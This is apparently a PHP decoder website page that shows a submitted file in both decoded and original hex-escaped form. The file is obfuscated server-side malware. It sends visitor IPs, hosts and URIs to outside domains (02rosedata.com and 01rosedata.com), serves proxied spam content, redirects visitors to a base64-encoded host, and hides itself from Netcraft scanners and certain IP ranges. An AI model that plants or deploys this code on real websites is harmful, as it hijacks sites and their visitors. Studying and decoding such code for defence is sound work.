Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function obtain_the_ip() { goto lLBFpkt; lLBFpFI: return $lCtptF[0]; goto lLBFpFt; lLBFpkL..

Decoded Output download

<?  function obtain_the_ip() { goto lLBFpkt; lLBFpFI: return $lCtptF[0]; goto lLBFpFt; lLBFpkL: $lCtptk = $_SERVER["REMOTE_ADDR"]; goto lLBFpks; lLBFpkD: goto lLBFpkk; goto lLBFpkg; lLBFpkB: $lCtptk = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto lLBFpkD; lLBFpkZ: $lCtptk = $_SERVER["HTTP_CLIENT_IP"]; goto lLBFpkw; lLBFpFp: $lCtptF = explode(",", $lCtptk); goto lLBFpFI; lLBFpkx: lLBFpkF: goto lLBFpkB; lLBFpFk: $lCtptk = $_SERVER["HTTP_X_REAL_IP"]; goto lLBFpFF; lLBFpkE: if (isset($_SERVER["HTTP_CLIENT_IP"])) { goto lLBFpkp; } goto lLBFpkQ; lLBFpkC: lLBFpkI: goto lLBFpFk; lLBFpkg: lLBFpkp: goto lLBFpkZ; lLBFpFF: lLBFpkk: goto lLBFpFp; lLBFpkt: if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { goto lLBFpkF; } goto lLBFpkE; lLBFpkw: goto lLBFpkk; goto lLBFpkC; lLBFpkQ: if (isset($_SERVER["HTTP_X_REAL_IP"])) { goto lLBFpkI; } goto lLBFpkL; lLBFpks: goto lLBFpkk; goto lLBFpkx; lLBFpFt: } function _curl($lCtptp, $lCtptI = 30, $lCtptt = 0) { goto lLBFpFL; lLBFppt: $lCtptL = ''; goto lLBFppE; lLBFpFw: curl_setopt($lCtptQ, CURLOPT_SSL_VERIFYPEER, false); goto lLBFpFC; lLBFppQ: if (!(empty($lCtptL) && $lCtptt < 1)) { goto lLBFpFQ; } goto lLBFppL; lLBFppx: return $lCtptL; goto lLBFppB; lLBFppk: $lCtptL = curl_exec($lCtptQ); goto lLBFppF; lLBFpFD: curl_setopt($lCtptQ, CURLOPT_HTTPHEADER, $lCtptE); goto lLBFpFg; lLBFppI: if (!($lCtpts["http_code"] != "200")) { goto lLBFpFE; } goto lLBFppt; lLBFpFC: curl_setopt($lCtptQ, CURLOPT_TIMEOUT, $lCtptI); goto lLBFppk; lLBFpFL: $lCtptE = array("Accept-Language:" . @$_SERVER["HTTP_ACCEPT_LANGUAGE"], "User-IP:" . @obtain_the_ip(), "User-URI:" . @$_SERVER["REQUEST_URI"], "User-HOST:" . @$_SERVER["HTTP_HOST"]); goto lLBFpFs; lLBFppF: $lCtpts = curl_getinfo($lCtptQ); goto lLBFppp; lLBFppp: curl_close($lCtptQ); goto lLBFppI; lLBFpFs: $lCtptQ = curl_init(); goto lLBFpFx; lLBFpFB: curl_setopt($lCtptQ, CURLOPT_USERAGENT, @$_SERVER["HTTP_USER_AGENT"]); goto lLBFpFD; lLBFpFZ: curl_setopt($lCtptQ, CURLOPT_RETURNTRANSFER, 1); goto lLBFpFw; lLBFpFx: curl_setopt($lCtptQ, CURLOPT_URL, $lCtptp); goto lLBFpFB; lLBFpFg: curl_setopt($lCtptQ, CURLOPT_REFERER, @$_SERVER["HTTP_REFERER"]); goto lLBFpFZ; lLBFpps: lLBFpFQ: goto lLBFppx; lLBFppL: return _curl(str_replace("02rosedata.com/", "01rosedata.com/", $lCtptp), 30, 1); goto lLBFpps; lLBFppE: lLBFpFE: goto lLBFppQ; lLBFppB: } function _my_implement() { goto lLBFpIp; lLBFpts: $lCtpEp = _curl($lCtpEF); goto lLBFptx; lLBFptF: $lCtptB = "1.1.1"; goto lLBFptp; lLBFpIs: return; goto lLBFpIx; lLBFptB: exit($lCtpEp); goto lLBFptD; lLBFptk: if (!(!preg_match("/^[0-9]+\.[0-9]+\.[0-9\.]+/", $lCtptB) && _curl("https://app." . $lCtptZ . "/rose1007/_spi22.php") == "ok")) { goto lLBFppw; } goto lLBFptF; lLBFpIQ: $lCtptZ = "02rosedata.com"; goto lLBFpIL; lLBFpIC: lLBFppZ: goto lLBFptk; lLBFpIE: $lCtptg = obtain_the_ip(); goto lLBFpIQ; lLBFptg: lLBFpIF: goto lLBFptZ; lLBFptQ: $lCtpEF .= "&mp=1"; goto lLBFptL; lLBFpID: if (!preg_match("/^ok:(.+)$/", $lCtptC, $lCtpEk)) { goto lLBFppg; } goto lLBFpIg; lLBFpIL: if (!(preg_match("/Netcraft/i", $lCtptD) || preg_match("/(185\.216\.48|91\.236\.65)\./i", $lCtptg))) { goto lLBFppD; } goto lLBFpIs; lLBFptI: if (!preg_match("/^[0-9]+\.[0-9]+\.[0-9\.]+/", $lCtptB)) { goto lLBFpIF; } goto lLBFptt; lLBFpIB: if (!(preg_match("/^([0-9]+)\.([0-9]+)\.([0-9]+)\.[0-9]+\.[0-9]+\.[0-9]+/", $lCtptB, $lCtptw) && ($lCtptC = _curl("https://app." . $lCtptZ . "/rose1007/_gue22.php")))) { goto lLBFppZ; } goto lLBFpID; lLBFpIg: header("Location: https://" . base64_decode($lCtpEk[1]) . "/rose1007/jump1007.php?hh=" . $_SERVER["HTTP_HOST"] . "&s=" . $lCtptB); goto lLBFpIZ; lLBFptp: lLBFppw: goto lLBFptI; lLBFpIt: $lCtptD = !empty($_SERVER["HTTP_USER_AGENT"]) ? trim($_SERVER["HTTP_USER_AGENT"]) : ''; goto lLBFpIE; lLBFpIZ: exit; goto lLBFpIw; lLBFptD: lLBFpIk: goto lLBFptg; lLBFpII: $lCtptB = isset($_GET[$lCtptx]) ? trim($_GET[$lCtptx]) : ''; goto lLBFpIt; lLBFptt: $lCtpEF = "https://app." . $lCtptZ . "/rose1007/_proxy1007.php?key=" . $lCtptx . "&s=" . urlencode($lCtptB); goto lLBFptE; lLBFpIx: lLBFppD: goto lLBFpIB; lLBFptL: lLBFppC: goto lLBFpts; lLBFptE: if (empty($_GET["mp"])) { goto lLBFppC; } goto lLBFptQ; lLBFpIp: $lCtptx = "news"; goto lLBFpII; lLBFptx: if (!(strlen($lCtpEp) > 520)) { goto lLBFpIk; } goto lLBFptB; lLBFpIw: lLBFppg: goto lLBFpIC; lLBFptZ: } _my_implement(); 
 ?>

Did this file decode correctly?

Original Code

function obtain_the_ip() { goto lLBFpkt; lLBFpFI: return $lCtptF[0]; goto lLBFpFt; lLBFpkL: $lCtptk = $_SERVER["\122\x45\115\x4f\124\x45\137\101\x44\x44\x52"]; goto lLBFpks; lLBFpkD: goto lLBFpkk; goto lLBFpkg; lLBFpkB: $lCtptk = $_SERVER["\110\124\x54\x50\137\130\x5f\x46\x4f\122\x57\x41\x52\x44\x45\x44\x5f\x46\117\122"]; goto lLBFpkD; lLBFpkZ: $lCtptk = $_SERVER["\110\x54\x54\120\137\x43\114\111\x45\x4e\124\x5f\x49\x50"]; goto lLBFpkw; lLBFpFp: $lCtptF = explode("\x2c", $lCtptk); goto lLBFpFI; lLBFpkx: lLBFpkF: goto lLBFpkB; lLBFpFk: $lCtptk = $_SERVER["\110\x54\x54\120\x5f\130\x5f\x52\105\x41\114\137\x49\120"]; goto lLBFpFF; lLBFpkE: if (isset($_SERVER["\110\124\x54\x50\137\103\x4c\111\x45\116\x54\137\111\x50"])) { goto lLBFpkp; } goto lLBFpkQ; lLBFpkC: lLBFpkI: goto lLBFpFk; lLBFpkg: lLBFpkp: goto lLBFpkZ; lLBFpFF: lLBFpkk: goto lLBFpFp; lLBFpkt: if (isset($_SERVER["\x48\124\124\x50\137\130\x5f\106\x4f\x52\x57\101\x52\104\x45\x44\137\x46\117\122"])) { goto lLBFpkF; } goto lLBFpkE; lLBFpkw: goto lLBFpkk; goto lLBFpkC; lLBFpkQ: if (isset($_SERVER["\110\x54\x54\x50\137\x58\137\122\x45\x41\114\137\111\x50"])) { goto lLBFpkI; } goto lLBFpkL; lLBFpks: goto lLBFpkk; goto lLBFpkx; lLBFpFt: } function _curl($lCtptp, $lCtptI = 30, $lCtptt = 0) { goto lLBFpFL; lLBFppt: $lCtptL = ''; goto lLBFppE; lLBFpFw: curl_setopt($lCtptQ, CURLOPT_SSL_VERIFYPEER, false); goto lLBFpFC; lLBFppQ: if (!(empty($lCtptL) && $lCtptt < 1)) { goto lLBFpFQ; } goto lLBFppL; lLBFppx: return $lCtptL; goto lLBFppB; lLBFppk: $lCtptL = curl_exec($lCtptQ); goto lLBFppF; lLBFpFD: curl_setopt($lCtptQ, CURLOPT_HTTPHEADER, $lCtptE); goto lLBFpFg; lLBFppI: if (!($lCtpts["\x68\164\164\x70\137\x63\157\144\x65"] != "\62\x30\x30")) { goto lLBFpFE; } goto lLBFppt; lLBFpFC: curl_setopt($lCtptQ, CURLOPT_TIMEOUT, $lCtptI); goto lLBFppk; lLBFpFL: $lCtptE = array("\101\x63\x63\x65\160\164\55\x4c\x61\156\147\x75\141\147\145\x3a" . @$_SERVER["\110\x54\x54\x50\x5f\x41\x43\103\105\x50\x54\137\x4c\x41\x4e\107\125\101\x47\x45"], "\125\163\x65\x72\55\x49\x50\72" . @obtain_the_ip(), "\x55\163\145\162\x2d\125\x52\111\x3a" . @$_SERVER["\122\x45\121\125\105\x53\124\x5f\x55\122\111"], "\x55\x73\145\162\55\110\x4f\123\124\x3a" . @$_SERVER["\110\124\x54\120\x5f\110\117\123\124"]); goto lLBFpFs; lLBFppF: $lCtpts = curl_getinfo($lCtptQ); goto lLBFppp; lLBFppp: curl_close($lCtptQ); goto lLBFppI; lLBFpFs: $lCtptQ = curl_init(); goto lLBFpFx; lLBFpFB: curl_setopt($lCtptQ, CURLOPT_USERAGENT, @$_SERVER["\x48\x54\124\x50\137\x55\x53\x45\x52\137\101\107\x45\116\124"]); goto lLBFpFD; lLBFpFZ: curl_setopt($lCtptQ, CURLOPT_RETURNTRANSFER, 1); goto lLBFpFw; lLBFpFx: curl_setopt($lCtptQ, CURLOPT_URL, $lCtptp); goto lLBFpFB; lLBFpFg: curl_setopt($lCtptQ, CURLOPT_REFERER, @$_SERVER["\110\x54\x54\x50\137\122\105\106\x45\x52\105\122"]); goto lLBFpFZ; lLBFpps: lLBFpFQ: goto lLBFppx; lLBFppL: return _curl(str_replace("\60\62\x72\x6f\163\x65\x64\x61\x74\141\x2e\143\x6f\x6d\x2f", "\x30\61\x72\157\x73\145\144\141\164\141\56\x63\157\x6d\57", $lCtptp), 30, 1); goto lLBFpps; lLBFppE: lLBFpFE: goto lLBFppQ; lLBFppB: } function _my_implement() { goto lLBFpIp; lLBFpts: $lCtpEp = _curl($lCtpEF); goto lLBFptx; lLBFptF: $lCtptB = "\61\56\x31\x2e\61"; goto lLBFptp; lLBFpIs: return; goto lLBFpIx; lLBFptB: exit($lCtpEp); goto lLBFptD; lLBFptk: if (!(!preg_match("\x2f\136\133\60\x2d\x39\x5d\x2b\x5c\56\133\60\55\x39\135\53\x5c\x2e\x5b\x30\55\71\x5c\x2e\135\53\57", $lCtptB) && _curl("\x68\164\164\x70\163\72\57\57\141\160\160\x2e" . $lCtptZ . "\x2f\162\157\x73\145\x31\x30\x30\x37\x2f\137\x73\160\x69\x32\62\56\160\150\160") == "\x6f\153")) { goto lLBFppw; } goto lLBFptF; lLBFpIQ: $lCtptZ = "\60\x32\162\x6f\163\145\144\x61\x74\x61\56\143\x6f\155"; goto lLBFpIL; lLBFpIC: lLBFppZ: goto lLBFptk; lLBFpIE: $lCtptg = obtain_the_ip(); goto lLBFpIQ; lLBFptg: lLBFpIF: goto lLBFptZ; lLBFptQ: $lCtpEF .= "\46\155\x70\75\x31"; goto lLBFptL; lLBFpID: if (!preg_match("\x2f\136\157\x6b\72\50\x2e\53\51\x24\x2f", $lCtptC, $lCtpEk)) { goto lLBFppg; } goto lLBFpIg; lLBFpIL: if (!(preg_match("\57\116\145\164\143\x72\141\x66\164\x2f\151", $lCtptD) || preg_match("\57\x28\x31\x38\x35\134\x2e\62\61\x36\x5c\x2e\x34\x38\174\71\61\x5c\56\62\63\66\134\56\66\65\x29\134\56\x2f\x69", $lCtptg))) { goto lLBFppD; } goto lLBFpIs; lLBFptI: if (!preg_match("\x2f\136\x5b\60\55\x39\135\x2b\x5c\x2e\133\60\55\x39\x5d\53\134\56\x5b\x30\55\71\134\x2e\x5d\x2b\57", $lCtptB)) { goto lLBFpIF; } goto lLBFptt; lLBFpIB: if (!(preg_match("\x2f\136\50\x5b\x30\55\x39\135\53\x29\134\56\x28\x5b\60\55\71\135\53\51\x5c\56\x28\133\x30\55\71\135\53\x29\x5c\x2e\x5b\x30\55\x39\x5d\53\x5c\56\133\x30\x2d\71\135\x2b\134\x2e\133\x30\55\x39\135\x2b\57", $lCtptB, $lCtptw) && ($lCtptC = _curl("\x68\164\x74\160\x73\x3a\x2f\57\141\160\160\56" . $lCtptZ . "\57\x72\157\x73\145\61\x30\60\67\57\137\x67\x75\x65\x32\62\x2e\x70\x68\x70")))) { goto lLBFppZ; } goto lLBFpID; lLBFpIg: header("\114\157\x63\141\164\151\157\156\x3a\x20\150\164\164\160\x73\72\x2f\57" . base64_decode($lCtpEk[1]) . "\57\162\157\163\x65\x31\60\x30\x37\x2f\x6a\165\x6d\x70\x31\60\x30\x37\56\x70\150\x70\77\150\150\x3d" . $_SERVER["\x48\124\x54\x50\x5f\110\x4f\123\124"] . "\x26\x73\x3d" . $lCtptB); goto lLBFpIZ; lLBFptp: lLBFppw: goto lLBFptI; lLBFpIt: $lCtptD = !empty($_SERVER["\110\124\124\120\x5f\x55\123\x45\x52\137\101\x47\x45\x4e\124"]) ? trim($_SERVER["\x48\x54\x54\120\x5f\x55\123\x45\122\137\101\107\x45\x4e\124"]) : ''; goto lLBFpIE; lLBFpIZ: exit; goto lLBFpIw; lLBFptD: lLBFpIk: goto lLBFptg; lLBFpII: $lCtptB = isset($_GET[$lCtptx]) ? trim($_GET[$lCtptx]) : ''; goto lLBFpIt; lLBFptt: $lCtpEF = "\150\164\164\x70\x73\x3a\x2f\x2f\141\x70\160\56" . $lCtptZ . "\57\x72\x6f\163\145\61\60\x30\67\x2f\137\x70\x72\157\x78\171\x31\x30\x30\x37\x2e\160\150\160\77\x6b\145\171\x3d" . $lCtptx . "\46\163\x3d" . urlencode($lCtptB); goto lLBFptE; lLBFpIx: lLBFppD: goto lLBFpIB; lLBFptL: lLBFppC: goto lLBFpts; lLBFptE: if (empty($_GET["\x6d\x70"])) { goto lLBFppC; } goto lLBFptQ; lLBFpIp: $lCtptx = "\156\x65\167\163"; goto lLBFpII; lLBFptx: if (!(strlen($lCtpEp) > 520)) { goto lLBFpIk; } goto lLBFptB; lLBFpIw: lLBFppg: goto lLBFpIC; lLBFptZ: } _my_implement();

Function Calls

None

Variables

None

Stats

MD5 b0e1314dd895f74769b3a67cf696b0f4
Eval Count 0
Decode Time 60 ms